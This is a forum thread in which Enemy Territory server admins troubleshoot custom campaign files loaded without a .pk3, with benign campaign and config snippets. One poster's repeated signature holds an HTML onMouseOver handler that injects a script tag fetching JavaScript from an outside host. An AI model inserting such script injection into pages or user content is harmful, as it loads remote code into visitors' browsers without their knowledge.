Custom campaign without the .pk3

Discussion for Admins of ETPro/BayonET servers.
If you don't run a server, please don't post here...

Moderators: Forum moderators, developers

Post Reply
User avatar
Dogwood
Posts: 46
Joined: Thu Dec 25, 2003 7:02 pm
Location: South Florida
Contact:

Custom campaign without the .pk3

Post by Dogwood »

I wrote a couple of campaigns as described in this thread and a custom campaign rotation script.
It all works fine, except for one thing.
In the client's "loading" screen there is no Campaign Description even though I have several lines in there, I know this can happen if the client does not have all of the maps in that campaign, but the campaign uses all original maps.
Additionally there is no Campaign Name at the top of the "loading" screen, nor map names on the big Map.

This file is called: bbret01.campaign

Code: Select all

{ 
   name       "BBr|ET Campaign 1" 
   shortname      "cmpgn_bbret01a" 
   description    "Welcome to the blah blah....."
   maps        "battery;radar;goldrush;oasis" 
   mapTC         374 374 
   type         "wolfmp" 
} 

{ 
   name       "BBr|ET Campaign 2" 
   shortname      "cmpgn_bbret01b" 
   description    "Welcome to the blah blah....." 
   maps        "fueldump;railgun;battery;radar" 
   mapTC         374 374 
   type         "wolfmp" 
}
This is the campaign.cfg

Code: Select all

set d1 "campaign cmpgn_bbret01a ; set nextcampaign vstr d2"
set d2 "campaign cmpgn_bbret01b ; set nextcampaign vstr d1"

// server doesn't recognise the campaign command when the gamecode isn't running yet.
set d_initial "set g_gametype 4 ; map battery ; set nextcampaign vstr d2"
vstr d_initial
This is the part of the server.cfg that is relevant

Code: Select all

set b_campaignFile "scripts/bbret01.campaign"

exec campaigncycle.cfg
I placed the bbret01.campaign file in a directory I created called:
/etmain/scripts

I'm sure it's something simple that I'm missing here, but I can't figure it out.
I have done dozens of the custom campaign scripts using the .pk3 method and have had no problem at all, but would like to try and use this method now.
Any help you can provide would be appreciated.
BBr|ET Clan Leader
BroadbandReports.com
uber-noob
Posts: 285
Joined: Sat Dec 20, 2003 2:02 pm
Location: Germany
Contact:

Re: Custom campaign without the .pk3

Post by uber-noob »

Dogwood wrote: I have done dozens of the custom campaign scripts using the .pk3 method and have had no problem at all, but would like to try and use this method now.
Any help you can provide would be appreciated.
Well, the client needs the campaign file to read the description, campaign name and map names. But unless the campaign file is conatined inside a pk3 it won't be downloaded, so the client has no clue about whats going on there.
User avatar
Rain
Posts: 635
Joined: Sat Aug 02, 2003 3:44 pm
Location: Muffin Laboratories
Contact:

Post by Rain »

I'd like to make the campaign info completely server-side some time in the future (i.e. no need for a client pk3), but that hasn't happened yet.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
User avatar
Dogwood
Posts: 46
Joined: Thu Dec 25, 2003 7:02 pm
Location: South Florida
Contact:

Post by Dogwood »

Well OK then.
Thanks to both of you for setting me straight.
BBr|ET Clan Leader
BroadbandReports.com
O2.iceman
Posts: 92
Joined: Thu Jul 24, 2003 2:17 pm

Post by O2.iceman »

So what use is the b_campaignfile variable then?

Should we be putting the .campaign in a pk3 so it gets downloaded, as well as having the .campaign on it's own in the scripts directory?
O2.iceman
Oxygen
User avatar
Rain
Posts: 635
Joined: Sat Aug 02, 2003 3:44 pm
Location: Muffin Laboratories
Contact:

Post by Rain »

b_campaignfile, when set, prevents the server from scanning for campaign files (and thereby referencing every pk3 that has one, which requires clients to download all those pk3s.)
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
BOTA
Posts: 136
Joined: Wed Oct 23, 2002 3:53 am

Post by BOTA »

What if you use a campaign to force the download of a .pk3 containing a server watermark.
So clients see them.
Would in future if no campaign scanning takes place anymore,
this not hinder a required download for a server watermark?
User avatar
Rain
Posts: 635
Joined: Sat Aug 02, 2003 3:44 pm
Location: Muffin Laboratories
Contact:

Post by Rain »

The watermark pk3 should always be automatically downloaded, there's no sense in including a campaign as well.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
BOTA
Posts: 136
Joined: Wed Oct 23, 2002 3:53 am

Post by BOTA »

That is very strange.
Since the only way I got it to be sent to players was putting in a useless campaign.
I will investigate what I did wrong.
uber-noob
Posts: 285
Joined: Sat Dec 20, 2003 2:02 pm
Location: Germany
Contact:

Post by uber-noob »

BOTA wrote:I will investigate what I did wrong.
Let me guess, you placed the pk3 inside of etmain instead of putting it into the etpro directory.
BOTA
Posts: 136
Joined: Wed Oct 23, 2002 3:53 am

Post by BOTA »

Actualy for someone who thinks he is pretty up to date on this stuff (me).
You may very well be right :)
Thans.. :oops:
Post Reply